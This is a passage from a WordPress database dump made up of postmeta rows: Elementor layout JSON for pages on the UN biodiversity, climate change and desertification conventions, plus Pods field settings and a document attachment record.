Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474,476,477,478\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(6218,568,'_wp_page_template','default'),(6219,568,'_elementor_edit_mode','builder'),(6220,568,'_elementor_template_type','wp-page'),(6221,568,'_elementor_version','2.7.5'),(6222,568,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"479,480,481,482,483,484,485,486,487,488,489\",\"title_trimmed\":\"\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"align\":\"center\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474,476,477,478\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(6225,569,'_wp_page_template','default'),(6226,569,'_elementor_edit_mode','builder'),(6227,569,'_elementor_template_type','wp-page'),(6228,569,'_elementor_version','2.7.5'),(6229,569,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"400\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"400\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"479,480,481,482,483,484,485,486,487,488,489\",\"title_trimmed\":\"\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"400\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474,476,477,478\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(6233,570,'_edit_last','42'),(6234,570,'_edit_lock','1670322861:42'),(6235,571,'_wp_attached_file','2019/11/liberia-nbsap-v2-en.pdf'),(6239,570,'_elementor_controls_usage','a:0:{}'),(6240,570,'by','Environmental Protection Agency'),(6241,570,'year','2017'),(6242,570,'_pods_attached_document','a:1:{i:0;i:571;}'),(6252,576,'_elementor_controls_usage','a:0:{}'),(6253,576,'type','file'),(6254,576,'pick_object','custom-simple'),(6255,576,'required','0'),(6256,576,'text_allow_shortcode','0'),(6257,576,'text_allow_html','0'),(6258,576,'text_allowed_html_tags','strong em a ul ol li b i'),(6259,576,'text_max_length','255'),(6260,576,'website_format','normal'),(6261,576,'website_allow_port','0'),(6262,576,'website_clickable','0'),(6263,576,'website_new_window','0'),(6264,576,'website_max_length','255'),(6265,576,'website_html5','0'),(6266,576,'phone_format','999-999-9999 x999'),(6267,576,'phone_enable_phone_extension','1'),(6268,576,'phone_max_length','25'),(6269,576,'phone_html5','0'),(6270,576,'email_max_length','255'),(6271,576,'email_html5','0'),(6272,576,'password_max_length','255'),(6273,576,'paragraph_allow_html','1'),(6274,576,'paragraph_oembed','0'),(6275,576,'paragraph_wptexturize','1'),(6276,576,'paragraph_convert_chars','1'),(6277,576,'paragraph_wpautop','1'),(6278,576,'paragraph_allow_shortcode','0'),(6279,576,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(6280,576,'paragraph_max_length','0'),(6281,576,'wysiwyg_editor','tinymce'),(6282,576,'wysiwyg_media_buttons','1'),(6283,576,'wysiwyg_oembed','0'),(6284,576,'wysiwyg_wptexturize','1'),(6285,576,'wysiwyg_convert_chars','1'),(6286,576,'wysiwyg_wpautop','1'),(6287,576,'wysiwyg_allow_shortcode','0'),(6288,576,'code_allow_shortcode','0'),(6289,576,'code_max_length','0'),(6290,576,'datetime_type','format'),(6291,576,'datetime_format','mdy'),(6292,576,'datetime_time_type','12'),(6293,576,'datetime_time_format','h_mma'),(6294,576,'datetime_time_format_24','hh_mm'),(6295,576,'datetime_allow_empty','1'),(6296,576,'datetime_html5','0'),(6297,576,'date_type','format'),(6298,576,'date_format','mdy'),(6299,576,'date_allow_empty','1'),(6300,576,'date_html5','0'),(6301,576,'time_type','12'),(6302,576,'time_format','h_mma'),(6303,576,'time_format_24','hh_mm'),(6304,576,'time_allow_empty','1'),(6305,576,'time_html5','0'),(6306,576,'number_format_type','number'),(6307,576,'number_format','i18n'),(6308,576,'number_decimals','0'),(6309,576,'number_format_soft','0'),(6310,576,'number_step','1'),(6311,576,'number_min','0'),(6312,576,'number_max','100'),(6313,576,'number_max_length','12'),(6314,576,'currency_format_type','number'),(6315,576,'currency_format_sign','usd'),(6316,576,'currency_format_placement','before'),(6317,576,'currency_format','i18n'),(6318,576,'currency_decimals','2'),(6319,576,'currency_decimal_handling','none'),(6320,576,'currency_step','1'),(6321,576,'currency_min','0'),(6322,576,'currency_max','1000'),(6323,576,'currency_max_length','12'),(6324,576,'file_format_type','single'),(6325,576,'file_uploader','attachment'),(6326,576,'file_attachment_tab','upload'),(6327,576,'file_edit_title','0'),(6328,576,'file_show_edit_link','0'),(6329,576,'file_linked','0'),(6330,576,'file_limit','0'),(6331,576,'file_restrict_filesize','10MB'),(6332,576,'file_type','images'),(6333,576,'file_field_template','rows'),(6334,576,'file_add_button','Add Cover Image'),(6335,576,'file_modal_title','Attach a file'),(6336,576,'file_modal_add_button','Add 